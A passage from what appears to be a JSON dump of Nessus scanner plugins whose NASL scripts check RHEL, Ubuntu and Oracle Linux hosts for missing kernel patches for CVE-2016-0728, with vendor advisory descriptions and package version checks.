value:\"2016:0064\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2016:0064)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0728\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:0064\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0064\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:37", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 15.10 : linux vulnerability (USN-2872-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:15.10"], "id": "UBUNTU_USN-2872-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88014", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88014);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-1\");\n\n script_name(english:\"Ubuntu 15.10 : linux vulnerability (USN-2872-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-25-generic\", pkgver:\"4.2.0-25.30\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-25-generic-lpae\", pkgver:\"4.2.0-25.30\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-25-lowlatency\", pkgver:\"4.2.0-25.30\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:37", "description": "The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2016-3509 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-01-21T00:00:00", "type": "nessus", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2016-3509.NASL", "href": "https://www.tenable.com/plugins/nessus/88032", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3509.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88032);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 / 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2016-3509 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1\n mishandles object references in a certain error case, which allows local users to gain privileges or cause\n a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2016-3509.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6 / 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['3.8.13-118.2.5.el6uek', '3.8.13-118.2.5.el7uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2016-3509');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '3.8';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'dtrace-modules-3.8.13-118.2.5.el6uek-0.4.5-3.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-3.8.13'},\n {'reference':'kernel-uek-debug-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-3.8.13'},\n {'reference':'kernel-uek-debug-devel-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-3.8.13'},\n {'reference':'kernel-uek-devel-3.8.13-118.2.5.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-3.8.13'},\n {'reference':'kernel-uek-doc-3.8.13-118.2.5.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-3.8.13'},\n {'reference':'kernel-uek-firmware-3.8.13-118.2.5.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-3.8.13'},\n {'reference':'dtrace-modules-3.8.13-118.2.5.el7uek-0.4.5-3.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-3.8.13-118.2.5.el7uek', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-3.8.13'},\n {'reference':'kernel-uek-debug-3.8.13-118.2.5.el7uek', 